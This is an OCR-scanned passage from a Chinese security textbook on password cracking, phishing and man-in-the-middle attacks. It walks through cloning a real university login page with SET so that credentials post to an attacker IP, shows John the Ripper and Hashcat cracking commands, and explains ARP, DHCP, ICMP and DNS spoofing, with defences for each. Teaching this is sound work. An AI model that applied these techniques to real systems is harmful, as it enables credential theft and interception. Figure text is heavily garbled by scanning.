5.1.1 口令 破解 与 破解 工具 


许多 网 络 协议 如 HTTP、SMTP、POP3 和 TELNET 等 默认 采用 明文 传输 账号 和 口 
令 信息 ,攻击 者 只 需 在 信息 传输 路 径 的 某 个 节点 使 用 网 络 监听 ( 见 2. 6 节 ) 技 术 即 可 轻易 
截获 目标 系统 的 账号 和 口令 。 针 对 采用 散 列 算法 加 密 口令 的 网 络 协议 如 SMB、SSH、 
VNC、MYSQL、MSSQL、NTLM 等 ,攻击 者 应 用 弱 口令 扫描 ( 见 4. 4 节 ) 技 术 结合 适当 的 
口令 字典 可 以 破解 一 些 设置 较为 简单 的 用 户口 令 。 当 用 户 使 用 较 复杂 的 字符 组 合作 为 口 
令 时 ,如 口令 长 度 大 于 8 个 字符 、 采 用 大 小 写字 母 结合 数字 和 符号 等 ,或 者 目标 系统 设置 
了 登录 策略 ,例如 只 允许 一 定 次 数 的 失败 登录 尝试 , 则 弱 口 令 扫描 几乎 无 法 成 功 。 

暴力 破解 (Brute-force Attack) 方 法 的 前 提 是 获取 经 过 散 列 算法 单 向 加 密 的 口令 , 然 
后 采用 口令 字典 或 穷 举 口令 字符 空间 的 方式 对 加 密 后 的 口令 进行 离线 破解 。 破 解 原理 与 
弱 口 令 扫 描 类 似 , 都 是 根据 不 同 协议 所 采用 的 公开 的 散 列 算法 进行 口令 的 正 向 猜测 , 当 针 
对 猜测 的 口令 生成 的 散 列 值 与 截获 的 口令 散 列 值 相同 时 , 则 找到 了 正确 的 口令 。 暴 力 破 
解 针 对 字符 空间 进行 穷 举 时 ,需要 花费 的 时 间 随 着 口令 长 度 的 增加 和 字符 数量 的 增加 成 
几何 级 数 增长 ,因此 攻击 者 必须 耗费 大 量 的 计算 资源 进行 并 行 计算 才 有 可 能 在 有 效 时 间 
内 成 功 破解 。 

由 于 穷 举 字符 空间 过 于 费时 ,攻击 者 们 开发 出 一 种 称 为 “彩虹 表 攻 击 ” 的 破解 技术 。 
彩虹 表 是 一 张 预先 计算 好 ,针对 不 同 散 列 算法 的 逆 运 算 的 表 , 其 中 存储 部 分 明文 口令 和 口 
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令 散 列 的 对 应 关系 。 通 俗 地 说 ,彩虹 表 就 是 一 个 庞大 的 、 针 对 各 种 可 能 的 字符 组 合 预 先 计 
算 好 的 散 列 值 集合 。 彩 虹 表 攻击 比 暴 力 破解 处 理 时 间 少 而 需要 的 空间 多 ,一 般 主 流 彩虹 
表 大 小 在 100GB 左右 ,但 比 字 典 攻 击 需要 的 空间 少 而 处 理 时 间 多 。 

社会 工程 学 ( 见 2.4 节 ) 方 法 也 可 以 用 于 窃取 用 户口 令 , 这 种 方式 一 般 称 为 “钓鱼 ”。 
其 基本 原理 是 攻击 者 通过 伪造 登录 界面 提供 虚假 页 面 、 发 送 连接 发 送 伪造 邮件 等 
方式 ,使 用 高 度 逼 真 的 图 片 和 内 容 诱 使 用 户 输入 真实 的 口令 ,隐藏 在 这 些 虚 假 界 面 、 页 面 、 
链接 和 邮件 后 的 程序 或 脚本 会 通过 各 种 途径 记录 这 些 口令 并 隐蔽 地 提交 给 攻击 者 。 

图 5-1 说 明 如 何 使 用 KALI Linux 中 收集 的 社会 工程 学 工具 SET (Social 
Engineering Tools) 伪 造 网 站 “oa. jxnu. edu. cn” 的 首页 地 址 。SET 是 一 款 基于 Python 开 
发 的 命令 行 菜单 式 的 工具 集 (setoolkit) ,构造 钓鱼 页 面 的 方法 是 “Web Site Attack 
Vectors”>“Credential Harvester Attack Method” 一 “Site Cloner” ,具体 设 置 如 图 5-1 所 
示 , 受 害 者 的 口令 会 通过 “post. php” 脚 本 发 送 至 IP“192. 168. 2. 200”, 伪 造 的 网 站 效果 如 
图 5-2 所 示 ,与 实际 主页 一 模 一 样 。 











图 5-1 使 用 SET 工具 伪造 钓鱼 页 面 






器 192.168.2.200 





移动 办 公 简介 上 


图 5-2 ”钓鱼 页 面 效果 图 
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图 5-3 说 明了 整个 钓鱼 过 程 的 基本 原理 ,克隆 的 页 面 (index. html) 主要 修改 了 页 面 
表单 的 提交 动作 ,将 action 修改 为 “http://192. 168. 2. 200/post. php”, 当 用 户 输入 口令 
时 ,钓鱼 页 面 会 把 表单 提交 给 post. php 处 理 。 而 post. php 的 动作 是 向 文件 “phish. txt” 
写 入 所 有 提交 的 表单 内 容 ,然后 再 跳 转 至 实际 的 目标 网 站 “oa. jxnu. edu. cn”。 图 5-3(b) 
列 出 了 phish. txt 中 的 内 容 , 即 为 用 户 提交 的 表单 信息 ,包含 了 用 户 账号 .口令 和 验证 码 
等 信息 。 攻 击 者 也 可 以 把 该 页 面 作为 附件 发 送 给 目标 用 户 , 配 上 虚假 文字 , 诱 使 用 户 打开 
页 面 并 输入 口令 ,从 而 成 功 窃取 用 户口 令 。 





























(a) (b) 
图 5-3 钓鱼 页 面 的 原理 


5.1.2 破解 工具 


用 于 口令 破解 的 自动 工具 非常 多 ,但 是 公认 的 经 典 免费 工具 主要 有 Cain&Abel John 
The Ripper@ ,hashcat@ .Ophtcrack@ 、RainbowCrack@ 等 ,这 些 工 具 将 用 户 预先 导入 的 经 过 散 
列 算法 加 密 的 口令 或 者 口令 文件 进行 解密 ,经 过 正 向 猜测 后 还 原 出 原来 的 明文 口令 。 

1. Cain & Abel 

Cain & Abel 是 Windows 下 最 好 的 口令 监听 和 破解 平台 ,功能 异常 强大 ,不 仅 提 供 
各 种 协议 的 口令 监听 、 弱 口令 攻击 ,同时 支持 大 部 分 散 列 算法 的 口令 破解 ,包括 暴力 破解 
和 彩虹 表 破 解 。 它 可 以 远程 截取 并 破解 Windows 的 屏保 口令 、 远 程 共 享 口令 、SMB 口 
今 .Remote Desktop 口令 ,NTLM Session Security 口令 等 。 但 是 该 工具 已 经 停止 更 新 ， 
最 新 的 版 本 只 能 适用 于 Windows 2003 Server/XP 或 早期 系统 。 图 5-4 一 图 5-7 给 出 了 利 
用 Cain & Abel 的 Cracker 模块 破解 Windows 2003 Server 用 户口 令 的 示例 ,首先 导入 
Windows 存储 用 户口 令 的 文件 (图 5-4) ,然后 可 以 选择 一 个 或 其 中 几 个 进行 破解 (图 5-5) ,如 
果 选 择 暴力 破解 ,需要 指明 字符 集合 以 及 口令 的 长 度 范围 (图 5-6 说 明 字符 集 为 字符 加 小 
写字 母 ,口令 长 度 为 1 一 6 个 字符 ); 如 果 选 择 字典 破解 ,需要 导入 相应 的 字典 文件 ; 如 果 
选择 彩虹 表 破 解 , 需 要 导入 相应 的 彩虹 表 文 件 。 另 外 ,对 于 每 种 破解 方式 还 支持 采用 各 种 
组 合 规则 , 增 大 破解 的 成 功 概率 。 示 例 选择 暴力 破解 ,指明 该 口令 采用 NTLM 散 列 算法 

















http://www. oxid. it/cain. html 
http://www. openwall. com/john/ 
https://hashcat. net/hashcat/ 
http://ophcrack. sourceforge. net/ 
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http://project-rainbowcrack. com/ 
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加 密 , 图 5-7 给 出 了 暴力 破解 后 的 结果 为 “test12”。 











BIE-FSk lashes 
FEM SSNL Hashes WP 








图 5-5 Cain & Abel 选择 暴力 破解 方式 并 指明 散 列 算法 


hashes of 


type NTIM loaded 
|Press the Start button to begin brute-force 





图 5-6 ”Cain & Abel 暴力 破解 的 字符 集 和 口令 长 度 设置 





图 5-7 Cain & Abel 暴力 破解 的 结果 


图 5-8 给 出 的 示例 使 用 Cain & Abel 的 Sniffer 模块 监听 访问 Windows 远程 共享 时 
的 经 过 散 列 算法 加 密 的 SMB 口令 ,然后 将 口令 发 送 至 Cracker 模块 进行 暴力 破解 ， 
Cain && Abel 提供 了 针对 各 种 协议 口令 的 监听 加 破解 的 完整 攻击 链 。 





可 
PL files 四 ) 

Ciseo IO0S-DS Jashes (0) 
Ciseo PTX-WDS Nashes 四 ) 


图 5-8 Cain & Abel 的 监听 加 破解 攻击 链 示 意图 


2. John the Ripper/Johnny 

它 是 一 款 免 费 开 源 软 件 ,是 早期 经 典 的 快速 口令 破解 命令 行 工具 ,支持 目前 大 多 数 的 
加 密 算 法 ,如 DES、MD4、MD5 等 。 它 支持 多 种 不 同类 型 的 系统 架构 ,包括 UNIX、Linux、 
Windows、DOS 模式 等 ,主要 用 于 破解 较 弱 的 UNIX/Linux 系统 口令 ,但 是 速度 不 如 
Hashcat, 它 不 支持 彩虹 表 破 解 。 目 前 的 最 新 版 本 是 John the Ripper 1. 8.0 版 ,Johnny 是 
Linux 下 的 图 形 化 版 本 。 

图 5-9 给 出 了 在 Windows 下 破解 一 台 Linux 虚拟 机 中 的 root 账户 口令 的 过 程 ， 
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“12. txt" 文 件 包含 从 /etc/shadow 文件 中 导出 的 root 账号 ,直接 执行 “john 12. txt” 即 开 
始 默 认 的 暴力 破解 过 程 , 其 自动 识别 加 密 口 令 的 散 列 算法 ,可 以 看 出 Linux 口令 文件 采用 
了 512 位 的 SHA 散 列 算法 加 密 , 解 密 后 的 明文 口令 是 “goodluck”, 可 以 使 用 
数 查阅 已 经 的 明文 口令 ,使 用 “--wordlist 二 ”可 以 指定 字典 文件 进行 字典 破解 。 
图 5-10 给 出 Johnny 图 形 工具 导入 /etc/shadow 文件 的 效果 , 单 击 *Start” 按 钮 即 可 开始 
暴力 破解 。 








-show” 参 








p Nohn188jiv \runbjohn 


8.19889/s 318.4p/s 318.4c/s 318.4C/s 3 


all of the cracked passvords reliably 





图 5-9 John 破解 Linux 口令 示例 








Johnny 加 回回 
File Attack Passwords 
里 员 | 
Open Passwd File Open Last Start, Start cracking passwords [ause Atta Copy 
User Password Hash GECOS 
1 root T16777.0:99999:7 | | 
2 daemon * 16655:0:99999:7: 
Options | bin * 16655:0:99999:7 
四 4 sys . 16655:0:99999:7: 
Statistics S| :ync * 16655:0:99999:7; 
区 6 games 。 16655:0:99999:7: 
Settings 国定 ， 165655:0:99999:7 
© Bp * 16655:0:99999:7 
Output 国有 ma * 16655:0:99999:7; 
10 news . 16655:0:99999:7: 
1 uucp 电 16655:0:99999:7 





图 5-10 Johnny 导入 /etc/shadow 口令 文件 示例 





本 地 破解 Windows XP/2003/7 系 
Windows 账户 信 


统 的 账户 口令 可 以 首先 使 用 pwdump79 工具 导出 
\ ,然后 使 用 John 进行 破解 ,具体 方式 如 图 5-11 所 示 ,与 破解 Linux 口 





DD http://www.openwall. com/passwords/windows-pwdump。 
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令 类 似 。 该 例 首先 使 用 “net user” 命 令 增加 一 个 账号 “guofan”, 口 令 为 “test123”, 然 后 用 
pwdump7 工具 (必须 有 管理 员 权限 ) 导 出 当前 所 有 账号 信息 写 入 文件 “4. txt”, 然 后 执行 
John 进行 字典 破解 ,从 图 5-11(b) 中 可 以 看 到 该 口令 很 快 被 破解 。 


lst El od 








(a) (b) 


图 5-11 John 结合 pwdump7 破解 Windows 本 地 口令 示例 


3. Hashcat 

它 是 目前 世界 上 最 快 最 先进 的 基于 GPU 的 口令 恢复 工具 ,支持 5 种 独特 攻击 模式 
和 超过 170 个 高 优化 哈 希 算法 。 它 支持 AMD (OpenCL) 和 Nvidia (CUDA) 图 形 处 理 
器 ,支持 Linux 和 Windows 7/8/10 平台 ,用 户 必 须 指明 具体 的 散 列 算法 (-m 参数 ) .采用 
哪 种 破解 方式 (-a 参数 ) ,以 及 需要 穷 举 的 字符 集 或 字典 文件 息 。 图 5-12 给 出 了 
Hashcat 的 几 个 简单 用 法 示例 。 图 5-13 的 错误 提示 指明 “无 法 载 入 散 列 值 ”, 因 为 在 命令 
中 没有 指明 具体 的 散 列 算法 (Windows 的 散 列 算法 是 NTLM, Hashcat 使 用 1000 表示 )。 
图 5-14 使 用 “--force” 参 数 (屏蔽 CPU/GPU 参数 不 匹配 而 产生 的 告警 ) ,并 指明 NTLM 
散 列 算法 ,使 用 字典 文件 “example. dict? 对 Windows 7 的 账户 进行 破解 ,成 功 解密 后 的 口 
令 是 “good”。 它 与 John the Ripper 相同 ,可 以 使 用 “--show ”参数 查阅 所 有 已 经 解密 的 
口令 。 








-TBasic Exanples ] 一 


Attack— 1 Hash— 上 
Type ! Exanple connand 















Wordlist 1 hashcat -a 日 -mn 498 exanple499.hash exanple.dict 
Wordlist + MD5 ! hashcat -a 日 -mn @ exanple@.hash exanple.dict —r rules/best64.rule 
Brute-Force 1 MD5 1 hashcat -a 3 -nm 8 exanpleB-hash ?a7a?a?7a?a?a 


Conbinator 1 MD5 1 hashcat -a 1 -rn @ exanple@.hash exanple.dict exanple.dict 
I you still have no idea what just happened, try the following pages: 


«https://hashcat.net/wiki/Nhoutos_videos_papers_articles_etc_in_the_wild 
[= https://hashcat.net/faq/ 











图 5-12 Hashcat 的 命令 示例 


4. Opherack 

Ophecrack 专门 使 用 彩虹 表 破 解 Windows LM 和 NTLM 散 列 算法 加 密 的 口令 , 它 支 
持 从 系统 导入 散 列 值 或 者 散 列 文件 格式 。 彩 虹 表 可 以 提前 根据 不 同 字符 集 和 字符 长 度 制 
作 , 在 官方 网 站 上 有 主流 的 彩虹 表 下 载 。 图 5-15 示例 其 基本 使 用 方法 ,首先 装 人 系统 的 
散 列 值 或 者 从 文件 导入 .然后 单 击 *Tables” 按 钮 装 入 制作 好 的 彩虹 表 , 单 击 “Crack” 按 钮 
即 可 。 
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a 











: sers\yangyang \Desktop\hashcat-3.5.8\hashcat-3 
dninistrator :5 :NO PRSSVORDwrrrereeeenonoeennrz8ER5F8C44F6F7D146BD941604C71DDB9:= 






Device #2: Hainan, 


Qtype 8.txt 


:Wsers\yangyang\Desktop\hashcat-3.5.8\hashcat-3.5.8>hashcat64 一 force 8.txt 
shcat Cv3.5.0) starting... 


-4388U CPU @ 1.98GHz. skipped. 


1791/2848 MB allocatable, 4MCU 
: IntelCR》 CoreCIN> i5-4388U CPU @ 1.99GHz, 


skipped. 





图 5-13 ”Hashcat 错误 示例 
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图 5-14 Hashcat 字典 破解 示例 
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5. RainbowCrack 








RainbowCrack 也 使 月 











图 5-15 ”Ophcrack 破解 示例 


彩虹 表 进 行 破解 口令 ,但 是 它 几 乎 支持 所 有 散 列 算法 ,同时 支 


持 GPU 加 速 技术 ,最 重要 的 是 , 它 提供 了 自动 生成 彩虹 表 的 组 件 ,还 有 一 个 单独 的 多 线 
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程 版 本 rcracki_mt?。 用 户 必须 自行 提供 散 列 值 , 它 只 负责 生成 彩虹 表 并 破解 (图 5-16) 。 
用 户 首先 使 用 rtgen. exe 根据 所 选 字 符 集 生成 不 同 规模 的 彩虹 表 ( 彩 虹 表 生成 的 有 关 参 
数 请 查阅 相关 文献 9) ,然后 使 用 rtsort. exe 对 其 进行 排序 ,接着 就 可 以 装载 该 彩虹 表 进 行 
自动 破解 (图 5-17) 。 
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图 5-17 生成 6 位 数字 口令 的 彩虹 表 、 排 序 、 装 入 彩虹 表 的 破解 结果 


5.2 ”中间 人 攻击 (MITM) 


实现 MITM 的 首要 任务 是 截获 通信 双方 的 数据 ,然后 才 是 自 改 数据 进行 攻击 。 在 集 
线 器 组 成 的 局 域 网 中 实现 监听 十 分 容易 ,因为 所 有 主机 共享 一 条 信道 ,数据 会 广播 至 所 有 
端口 ,攻击 者 只 需要 将 网 卡 设置 为 混杂 模式 即 可 。 但 是 ,现在 已 经 普遍 采用 交换 机 式 局 域 
网 ,通信 双方 独占 信道 ,其 他 主机 的 通信 报 文 不 会 发 送 至 攻击 者 的 网 卡 , 因 此 攻击 者 必须 


©® https://sourceforge. net/projects/rcracki/ 。 
回 http://project-rainbowcrack. com/generate. pdf。 
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主动 攻击 以 截获 主机 间 的 通信 数据 。 在 广域网 中 ,攻击 者 必须 修改 通信 路 径 中 的 某 个 路 
由 器 以 获取 双方 的 通信 报 文 , 因 此 需要 控制 路 由 器 或 对 其 进行 路 由 欺骗 。 

根据 截获 报 文 的 不 同 应 用 协议 ,MITM 有 不 同 的 攻击 方式 ,如 DNS 欺骗 用 于 修改 
DNS 应 答 报 文 并 诱导 用 户 访问 钓鱼 页 面 `.Web 欺骗 修改 HTTP 请 求 和 响应 报 文 。 


5.2.1 数据 截获 


交换 式 局 域 网 中 截获 和 监听 数据 的 方式 主要 有 站 表 溢 出 、ARP 欺骗 ,DHCP 欺骗 和 
ICMP 重 定向 。 广 域 网 中 主要 使 用 路 由 欺骗 ,相对 而 言 , 广 域 网 截获 数据 的 难度 要 大 得 多 。 

1. 站 表 溢出 

交换 机 根据 站 表 转 发 MAC 帧 ,站 表 中 的 项 通过 以 太 网 帧 的 源 MAC 地 址 学 习 获 得 ， 
当 交 换 机 在 站 表 中 无 法 找到 以 太 网 帧 的 目标 MAC 地 址 时 ,会 广播 该 帧 给 所 有 端口 。 而 
且 站 表 中 的 每 一 项 都 有 生命 周期 ,如 果 在 周期 内 一 直 没 有 收 到 与 源 MAC 地 址 匹配 的 对 
应 帧 , 则 该 项 会 被 交换 机 从 站 表 中 删除 。 当 站 表 被 填 满 时 ,交换 机 将 停止 学 习 直 到 某 项 因 
为 超时 而 被 人 删除。 攻击 者 可 以 发 送 大 量 虚假 源 MAC 地 址 的 帧 来 占领 交换 机 的 站 表 , 使 
得 交换 机 转发 的 每 一 帧 都 是 广播 发 送 , 从 而 攻击 者 可 以 截获 所 有 经 过 交换 机 的 报 文 。 如 
图 5-18 所 示 ,交换 机 站 表 可 以 存储 6 项 ,攻击 者 C 只 需要 预先 发 送 6 个 不 存在 的 虚假 源 
MAC 地 址 的 以 太 网 帧 就 可 以 填 满 整个 站 表 , 此 时 当 A 与 B 进行 通信 时 ,由 于 站 表 已 经 无 
法 学 习 新 的 地 址 ,因此 A 与 B 之 间 的 通信 报 文 被 广播 至 其 他 所 有 端口 ,C 即 可 监听 到 它 
们 之 间 的 通信 。 









43 号 端口 








图 5-18 ”站 表 滋 出 攻击 


站 表 溢 出 的 防御 机 制 非常 简单 ,只 需要 设 定 一 项 功能 :“ 限 制 每 个 端口 允许 学 习 的 最 
大 地 址 数 ”"。 这 样 , 当 从 某 个 端口 学 习 的 地 址 数 达到 设置 的 上 限时 ,不 再 记录 到 站 表 中 , 即 
可 避免 站 表 被 填 满 。 

2. ARP 欺骗 

在 局 域 网 中 ,主机 通信 前 必须 通过 ARP 协议 把 IP 地 址 转换 为 MAC 地 址 ,ARP 欺 
骗 就 是 通过 伪造 IP 地 址 与 MAC 地 址 的 映射 关系 实现 的 一 种 欺骗 攻击 。 因 为 局 域 网 内 
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的 主机 根据 MAC 地 址 进行 通信 ,发 送 方 检查 其 ARP 缓存 中 是 否 已 存储 目标 IP 的 MAC 
地 址 ,否则 它 会 广播 发 送 ARP 请 求 报 文 ,只 有 目标 IP 的 主机 才 会 响应 一 个 包含 其 MAC 
地 址 的 ARP 应 答 报 文 ,发 送 方 收 到 该 应 答 后 ,立即 更 新 自身 的 ARP 缓存 。 攻 击 者 可 以 
发 送 虚假 的 ARP 请 求 或 应 答 报 文 ,使 得 目标 主机 接收 错误 的 IP 和 MAC 绑 定 关系 。 如 
图 5-19 所 示 ,攻击 者 从 C 向 目标 主机 A 发 送 伪造 的 ARP 请 求 或 应 答 报 文 , 使 得 A 的 
ARP 缓存 中 网 关 B 的 IP 地 址 映射 为 C 的 MAC 地址 ,因此 所 有 从 A 发 往外 网 的 报 文 都 
会 在 局 域 网 中 先 经 过 C,C 即 可 随意 修改 拒绝、 转发 A 与 外 界 的 所 有 报 文 ,同时 对 网 关 B 
进行 欺骗 ,这 样 B 返 回 给 A 的 报 文 也 被 C 截获 ,C 同时 完成 对 通信 双方 的 欺骗 ,此 时 可 以 
同时 自 改 两 个 方向 的 数据 。 


ARP 缓 存 





MAC AIP AI 
MAC-C IP-C[—®™| 
























让 ~ 
ARP 报 文 
ARP 缓 存 (IP_B，MAC_C) 








MAC-C IP-C 

















图 5-19 ARP 欺骗 攻击 


防御 ARP 欺骗 的 主要 方式 包括 : 
(1) 客户 端 静态 绑 定 网 关 的 真实 MAC 地 址 ,一 般 的 命令 格式 是 : 


arp -s 网 关 IP 地 址 网 关 MAC 地 址 


(2) 在 交换 机 和 路 由 器 上 设置 端口 与 MAC 地 址 的 静态 绑 定 。 

(3) 定期 检测 自身 的 ARP 缓存 ,检测 是 否 有 MAC 地 址 相同 的 不 同 表 项 , 即 可 发 现 
异常 。 
(4) 使 用 防火 墙 持 续 监 控 ARP 缓存 ,检测 异常 变化 。 

3. DHCP 欺骗 

DHCP 用 于 自动 配置 终端 接 人 网 络 所 需 的 信息 ,主要 包括 IP 地 址 、 掩 码 和 默认 网 关 
等 。 由 于 在 此 过 程 中 主机 没有 对 DHCP 服务 器 进行 任何 认证 ,攻击 者 可 以 伪装 成 DHCP 
服务 器 ,使 得 主机 在 刚 接 入 网 络 时 就 被 分 配 虚假 的 网 关 , 随 后 主机 的 所 有 通信 和 都 会 经 过 攻 
击 者 指定 的 虚假 网 关 。 图 5-20 给 出 了 实现 DHCP 欺骗 的 过 程 。 首 先 攻击 者 将 伪造 的 
DHCP 服务 器 A 接 人 局 域 网 , 当 目 标 主 机 C 发 送 DHCP 广播 请 求 并 收 到 多 个 DHCP 服 
务 器 应 答 时 ,根据 DHCP 协议 规定 , 它 会 选择 最 先 响应 的 服务 器 为 其 提供 配置 信息 。 只 
要 A 比 真 实 的 DHCP 服务 器 B 先 一 步 向 C 发 送 了 应 答 ,那么 C 会 收 到 A 发 来 的 虚假 配 
置信 息 , 其 中 虚假 网 关 的 IP 地 址 通常 就 是 A, 因 此 当 C 后 面 与 外 网 通信 时 ,所 有 报 文 会 先 
发 给 A。 
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冒充 的 DHCP 
服务 器 。 “1. DHCP 广 播发 现 





图 5-20 DHCP 欺骗 


主机 C 自身 无 法 识别 是 否 是 DHCP 欺骗 ,防御 DHCP 欺骗 必须 在 交换 机 上 配置 实 
现 。 dato 和 口 和 非 信 任 端口 ,交换 机 只 转发 从 信任 端口 发 出 的 
DHCP 应 答 报 文 , 管 理 员 必 须 将 + si dette 4 口 和 连接 不 同 交换 机 的 端口 设 
置 为 信任 端口 ,其 他 端口 一 律 设 置 为 非 信 任 端口 ,这 样 虚假 的 DHCP 应 答 报 文 都 会 被 交 
换 机 丢弃 。 
4. ICMP 路 由 重 定向 
如 图 5-21(a) 所 示 ,ICMP 路 由 重 定向 指 路 由 器 A 在 检测 到 某 台 主机 D 使 用 非 优 化 
路 由 时 ,会 向 该 主机 发 送 一 个 ICMP 重 定向 报 文 ,要 求 其 改变 路 由 为 从 路 由 器 B 发 送 报 
文 ,同时 路 由 器 A 会 把 初始 报 文 向 路 由 器 B 转发 ,主机 DD 以 后 的 所 有 报 文 都 从 路 由 器 B 
发 出 。 攻 击 者 向 目标 主机 DD 发 送 虚 假 的 ICMP 重 定向 消息 (图 5-21(b)) ,该 消息 的 源 地 
址 设 为 实际 的 路 由 器 A, 通 知 主机 新 的 路 由 器 是 攻击 者 的 机 器 C, 当 主机 发 现 该 消息 来 自 










,2192. 168.2, 100 


- EE 向， 

源 地 址 设置 为 A 
原始 默认 网 关 : 192.168.2.1 
192 1682 .5 新 的 默认 网 关 : 192.168.2.100 





(a) (b) 
图 5-21 ICMP 路 由 重 定向 过 程 
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路 由 器 A 时 , 则 错误 地 修改 自己 的 默认 网 关 为 C, 此 后 D 所 有 发 往外 网 的 报 文 都 经 过 C。 
需要 指出 的 是 ,此 攻击 只 是 完成 了 单 向 截获 ,从 路 由 器 A 返回 给 D 的 报 文 并 没有 被 C 
截获 。 

最 好 的 防御 方法 就 是 将 主机 配置 成 不 处 理 ICMP 重 定向 消息 。 也 可 以 对 该 消息 进行 
验证 和 识别 ,判定 是 否 来 自 真实 路 由 器 判定 其 中 包含 的 转发 报 文 的 头 信息 是 否 正确 等 ， 
但 是 由 于 这 些 信息 未 经 加 密 , 都 可 以 成 功 伪造 ,因此 并 不 是 完全 可 靠 。 

5. 路 由 欺骗 

图 5-22 示例 了 攻击 者 实施 路 由 欺骗 的 过 程 ,如 果 和 希望 LAN2 中 的 C 截获 LAN1 中 
A 发 给 LAN4 中 BB 的 所 有 通信 报 文 , 它 可 以 发 送 一 条 以 C 为 源 地 址 ,组 播 地 址 224. 0. 0. 9 
为 目的 地 址 (RIP 路 由 ) 的 路 由 消息 ,该 消息 伪造 C 与 LAN4 直接 相连 的 路 由 项 。 当 路 由 
器 Rl1 和 R2 分 别 收 到 该 消息 时 ,根据 RIP 路 由 算法 ,R2 发 现 从 C 通 往 LAN4 的 距离 与 
当前 路 由 表 中 通 往 LAN4 的 表 项 相同 (都 是 2) ,而 且 新 的 路 由 与 已 有 路 由 的 下 一 跳 不 同 ， 
该 消息 被 丢弃 ; R1 发 现 该 路 由 项 的 距离 小 于 当前 表 项 的 距离 (2 二 3) ,会 直接 更 新 路 由 
表 , 接 受 新 的 路 由 项 ,从 而 R1 通 往 LAN4 的 报 文 则 会 通过 攻击 者 所 在 的 主机 C。C 即 可 
截获 所 有 从 LANI1 发 往 LAN4 的 报 文 。 





R1 的 初始 路 由 表 R1 的 错误 路 由 表 

子 网 距离 下 一 跳 了 网 距离 下 一 跳 
LAN1 1 ”直接 LAN1 1 ”直接 
LAN2 1 直接 上 -=|LAN2 1 直接 
LAN3 2 IPR LAN3 2 IPR 
LAN4 3 _IPR LAN4 2 IPC 




















~ Talo) 


图 5-22 路 由 欺骗 


防止 路 由 欺骗 的 关键 是 实现 路 由 器 和 路 由 认证 , 即 接受 新 的 路 由 时 ,必须 确定 发 送 路 
由 器 的 身份 ,并 且 确 定 路 由 消息 自身 没有 被 中 途 修 改 , 才 能 对 路 由 信息 进行 处 理 。 认 证 方 
式 可 以 采用 9. 3 节 描 述 的 各 种 方式 实现 。 


5.2.2 欺骗 攻击 


成 功 截获 双方 的 通信 数据 后 ,攻击 者 可 以 根据 攻击 的 需要 以 及 截获 的 不 同 层次 协议 
报 文 展开 各 类 攻击 。 如 截获 的 数据 是 认证 协议 报 文 ,那么 其 中 包含 经 过 散 列 算法 加 密 的 
口令 ,可 以 实施 5. 1 节 的 口令 破解 ; 如 是 DNS 协议 请 求 应 答 报 文 ,可 以 修改 DNS 应 答 以 
实施 DNS 欺骗 ,欺骗 用 户 登 录 伪 造 的 页 面 , 再 结合 钓鱼 页 面 的 设计 ,可 以 实施 口令 窃取 、 
木马 攻击 等 ; 如 是 Web 访问 的 HTTP 协议 ,可 以 算 改 用 户 页 面 其 至 在 用 户 下 载 文档 时 
偷偷 捆绑 恶意 代码 ,实施 数据 攻击 ; 如 是 远程 登录 协议 ,包括 Rlogin、Telnet、SSH 和 
VPN 等 ,可 以 在 用 户 认证 结束 后 ,切断 用 户 连接 并 冒充 真实 用 户 与 服务 器 进行 通信 ,实施 
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会 话 劫持 。 总 之 , 当 攻 击 者 可 以 截获 并 随意 修改 通信 双方 的 数据 时 ,可 采取 的 攻击 方式 数 
不 胜 数 。 

1. DNS 欺骗 

DNS 的 工作 原理 : 当 客户 端 向 DNS 服务 器 查询 域名 时 ,本 地 DNS 服务 器 首先 在 本 
地 缓存 中 进行 查找 ,然后 在 本 地 数据 库 进行 查询 ,如 果 没 有 匹配 信息 则 向 根 服务 器 或 指定 
的 DNS 服务 器 进行 迭代 查询 ,每 台 服 务 器 都 重复 类 似 动作 , 当 在 某 台 服务 器 的 数据 库 中 
查找 到 对 应 信息 后 ,查询 路 径 中 的 所 有 服务 器 都 会 在 自己 的 缓存 中 保存 一 份 复制 ,然后 返 
回 给 路 径 中 的 下 一 个 服务 器 。 攻 击 者 根据 DNS 的 工作 原理 ,通过 拦截 和 修改 DNS 的 请 
求 和 应 答 包 进行 定向 DNS 欺骗 , 即 只 有 目标 主机 查询 特定 域名 时 , 才 修 改 返 回 的 DNS 应 
答 为 虚假 了 P, 其 他 情况 还 是 返回 真实 的 DNS 应 答 。 当 主机 访问 特定 域名 时 ,其 实 访 问 的 
是 攻击 者 指定 的 IP 地 址 ,从 而 实现 了 DNS 欺骗 。 

DNS 欺骗 的 手段 主要 有 : 

(1) 缓存 感染 : 直接 攻击 DNS 服务 器 ,将 虚假 的 映射 写 入 到 服务 器 的 缓存 或 数据 库 
中 , 当 DNS 查询 经 过 该 服务 器 时 ,服务 器 返回 虚假 的 应 答 报 文 。 

(2) DNS 信息 劫持 : 截获 并 修改 DNS 主机 A 记录 、MX 记录 和 CNAME 记录 应 答 
报 文 ,返回 虚假 的 应 答 报 文 给 目标 主机 。 

(3) DNS 重 定向 : 截获 并 修改 DNS 的 NS 记录 应 答 报 文 ,返回 虚假 的 DNS 服务 器 
地 址 给 目标 ,当主 机 访问 特定 域名 时 ,实际 上 是 从 虚假 服务 器 获得 DNS 应 答 。 

(4) Hosts 支持 ; 修改 目标 主机 的 Hosts 文件 , 写 入 虚假 的 主机 -IP 映射 ,主机 优先 查 
询 Hosts 文件 中 的 映射 ,没有 找到 匹配 信息 , 才 会 发 送 DNS 请 求 。 

缓存 感染 和 Hosts 劫持 需要 实现 对 目标 主机 或 服务 器 的 远程 入侵 ,常用 的 DNS 欺骗 
方法 主要 是 DNS 信息 劫持 和 重 定向 。 支 持 实现 DNS 信息 劫持 和 重 定向 的 常用 工具 有 
Cain& Abel dnschef 和 Ettercap 等 。 

Cain& Abel 不 仅 支 持 基于 ARP 的 DNS 欺骗 攻击 ,也 支持 一 些 针 对 加 密 协议 的 会 话 
劫持 。 图 5-23 列 出 了 实施 ARP 欺骗 的 准备 工作 ,攻击 者 需要 欺骗 的 主机 在 列表 左边 , 列 
表 右 边 列 出 针对 该 主机 可 进行 双向 欺骗 的 主机 列表 ,可 以 选择 其 中 一 个 或 几 个 同时 进行 
欺骗 。 接 着 ,攻击 者 需要 设置 好 虚假 的 主机 和 IP 映射 地 址 ,并 按 下 *ARP 欺骗 "按钮 ， 
Cain&.Abel 即 可 自动 实施 DNS 欺骗 (图 5-24)。 欺 骗 后 的 结果 如 图 5-25 所 示 ,ping 域名 
“www. baidu. com” 返 回 的 IP 地 址 是 “202. 101. 194. 153”, Web 访问 “www. baidu. com” 
